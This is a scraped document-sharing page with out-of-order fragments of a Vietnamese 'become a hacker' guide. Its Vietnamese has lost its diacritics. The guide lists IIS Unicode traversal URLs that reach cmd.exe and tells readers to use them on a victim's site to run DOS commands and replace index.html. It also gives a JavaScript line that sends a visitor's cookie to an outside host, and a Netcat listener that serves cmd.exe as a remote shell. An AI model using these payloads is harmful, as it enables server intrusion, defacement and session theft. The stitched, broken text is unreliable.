[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+ [3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+ [4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+ [5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ [6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+ [7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ [8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ [9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+ [10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+ [11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+ [12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+ [13]/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+ [14]/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.e xe?/c+ [15]/cgibin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ [16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe ?/c+ [17]/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.e xe?/c+ [18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe ?/c+ [19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe ?/c+ [20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.e xe?/c+
Cc bn s thy c tt c cc li trn nu trang Web nn nhn b tt c nhng li nh vy , nu server ca nn nhn ch b li th 13 v 17 th bng kt qu ch xut hin dng th 13 v 17 m thi . Ti ly VD l bng kt qu cho ti bit trang Web nn nhn b li th 3 v 7 , ti s ra IE v nhp on m tng ng trn Address :
http://www.xxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+ < == li dng th 3 hoc http://www.xxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ < == li dng th 7
n y cc bn c th xm nhp vo server ca nn nhn ri , cc bn hy s dng lnh trong DOS m khai thc thng tin trong ny . Thng thng cc trang Web nm th mc vinetpubwwwroot , cc bn vo c rI th ch cn thay index.html vI tn hack by . L c ri , ng quy h nh .
GOOKLUCK!!!!!!!!!!!!!!!

UDS - Tro Thanh Hacker

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

UDS - Tro Thanh Hacker

Uploaded by

Copyright:

Available Formats

Trn trng cm n ngi cung cp cho UDS cun sch ny.

Nhng hiu bit c bn nht tr thnh Hacker - Phn 1

Tc gi: Anhdenday - HVAOnline.net

<?php } else { echo ``nope``; }

hoc: [CODE img]javascript: Document.write(`&#x3cimg src=http://host_php/docs.php?docs=`+escape(document .cookie)+`&#x3e`)\">

GOODLUCK!!!!!!!!!!!! ( Ht phn 4 ) Anhdenday HVAonline.net

48 . ) Hng dn s dng Netcat :

#define GAPING_SECURITY_HOLE #define TELNET

CODE C: > nc -h connect to somewhere: nc [-options] hostname port[s] [ports] ...

d . ) Tm hiu Netcat qua cc VD :

_ Chp banner ca web server :

C: > nc -vv 172.16.84.1 80

Nu mun ghi nht k, hy dng -o . V d:

nc -vv -o nhat_ki.log 172.16.84.2 80

xem file nhat_ki.log xem th n ghi nhng g nh :

du < ngha l server gi n netcat du > ngha l netcat gi n server

nu bn cn scan cc cng UDP, dng -u

CODE E: > nc -nvv -L -p 8080 -e cmd.exe listening on [any] 8080 ...? ?

( Da theo bi vit ca huynh Vicky )

49 . ) K thut hack IIS server 5.0 :

CODE telnet < tn trang Web > 80 GET HEAD / HTTP/1.0

_ Cc bn s thy bng lit k li ( c lp trnh trong Unicode.pl ) nh sau :

CODE [1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+

http://www.xxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+ < == li dng th 3 hoc http://www.xxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ < == li dng th 7

You might also like